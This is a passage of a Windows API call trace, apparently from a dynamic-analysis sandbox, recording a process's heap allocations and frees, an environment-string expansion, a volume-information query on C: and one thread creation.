Ptr=0x63dfa8, Size=0x20) returned 0x625960 [0031.119] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x64d440, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0031.119] lstrlenW (lpString="C:\\") returned 3 [0031.119] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0031.120] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64d440 | out: hHeap=0x5f0000) returned 1 [0031.120] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a180, Size=0x82) returned 0x63b9b8 [0031.120] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a1a0, Size=0x100) returned 0x63ba48 [0031.120] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63b9b8, Size=0x104) returned 0x63bc70 [0031.120] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63ba48, Size=0x200) returned 0x63bd80 [0031.121] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62a190 | out: hHeap=0x5f0000) returned 1 [0031.121] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63bd80 | out: hHeap=0x5f0000) returned 1 [0031.121] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63b5d0 | out: hHeap=0x5f0000) returned 1 [0031.121] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b5f0 | out: hHeap=0x5f0000) returned 1 [0031.121] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63e008 | out: hHeap=0x5f0000) returned 1 [0031.121] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b678 | out: hHeap=0x5f0000) returned 1 [0031.121] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63e038 | out: hHeap=0x5f0000) returned 1 [0031.121] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63bc70 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63e020 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63bb50 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63b5e8 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63bbe0 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63b600 | out: hHeap=0x5f0000) returned 1 [0031.122] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63e020, Size=0x20) returned 0x625988 [0031.122] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625988, Size=0x40) returned 0x626ad0 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62a160 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63dfa8 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63b528 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63dfd8 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b568 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63dfc0 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62a170 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63dff0 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627ed0 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x626008 | out: hHeap=0x5f0000) returned 1 [0031.122] lstrlenW (lpString="%systemdrive%") returned 13 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625960 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b458 | out: hHeap=0x5f0000) returned 1 [0031.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62a140 | out: hHeap=0x5f0000) returned 1 [0031.122] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x62b430, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x100 [0031.123] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10014) returned 0x64d440 [0031.123] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x63dff0 [0031.123] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63dff0, Size=0x20) returned 0x625988 [0031.123] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625988, Size=0x40) returned 0x626b18 [0031.123] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626b18, Size=0x80) returned 0x64b458 [0031.123] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x64b458, Size=0x100) returned 0x63b9b8 [0031.123] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63b9b8, Size=0x200) returned 0x63b9b8 [0031.123] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63b9b8, Size=0x400) returned 0x63b9b8 [0031.123] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63b9b8, Size=0x800) returned 0x63b9b8 [0031.123] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63b9b8, Size=0x1000) returned 0x640068 [0031.123] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x65d460 [0031.123] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x63dff0 [0031.123] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63dfc0 [0031.123] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x62a140 [0031.123] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63dfd8 [0031.123] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x62a170 [0031.123] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63dfa8 [0031.123] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a140, Size=0x8) returned 0x62a160 [0031.123] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63e038 [0031.123] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x62a160, Size=0x10) returned 0x63e008 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b5d0 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b5e8 [0031.124] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63e008, Size=0x20) returned 0x625988 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63e008 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a160 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x63b600 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x63b618 [0031.124] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625988, Size=0x40) returned 0x626b18 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x63b630 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x63b648 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x63b660 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x63b678 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b690 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b6a8 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a140 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b6c0 [0031.124] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626b18, Size=0x80) returned 0x64b458 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b6d8 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b6f0 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b708 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b720 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b738 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63b750 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b768 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a1a0 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b780 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b798 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63b7b0 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b7c8 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63b7e0 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b7f8 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63b810 [0031.124] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b828 [0031.124] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x64b458, Size=0x100) returned 0x641088 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b840 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b858 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b870 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x63b888 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b8a0 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b8b8 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a180 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b8d0 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b8e8 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b900 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x62a1b0 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b918 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b930 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a1c0 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b948 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b960 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63b978 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b990 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b9d0 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63b9e8 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x63ba00 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ba18 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x63ba30 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ba48 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ba60 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ba78 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63ba90 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a1d0 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63baa8 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bac0 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bad8 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63baf0 [0031.125] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x641088, Size=0x200) returned 0x63bdb8 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bb08 [0031.125] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a1e0 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bb20 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bb38 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bb50 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bb68 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bb80 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bb98 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bbb0 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bbc8 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bbe0 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63bbf8 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63bc10 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bc28 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bc40 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63bc58 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63bc70 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bc88 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63bca0 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63bcb8 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bcd0 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bce8 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bd00 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a1f0 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bd18 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bd30 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bd48 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a200 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bd60 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63bd78 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bd90 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bfd8 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63bff0 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c008 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c020 [0031.126] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c038 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63c050 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63c068 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c080 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c098 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c0b0 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63c0c8 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c0e0 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c0f8 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c110 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c128 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c140 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c158 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c170 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a210 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x62a220 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c188 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c1a0 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c1b8 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c1d0 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c1e8 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63c200 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c218 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c230 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c248 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c260 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63c278 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c290 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c2a8 [0031.127] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x63bdb8, Size=0x400) returned 0x643070 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c2c0 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c2d8 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63c2f0 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c308 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c320 [0031.127] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c338 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x63c350 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c368 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c380 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x63c398 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a230 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643490 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x6434a8 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6434c0 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6434d8 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6434f0 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643508 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x643520 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643538 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643550 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643568 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643580 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643598 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6435b0 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6435c8 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6435e0 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x62a240 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6435f8 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643610 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643628 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643640 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643658 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643670 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643688 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6436a0 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6436b8 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x6436d0 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6436e8 [0031.128] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x643700 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643718 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643730 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643748 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643760 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643778 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x643790 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6437a8 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6437c0 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6437d8 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6437f0 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643808 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643820 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643838 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643850 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643890 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6438a8 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6438c0 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6438d8 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6438f0 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643908 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643920 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643938 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643950 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x643968 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x626028 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643980 [0031.129] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x643998 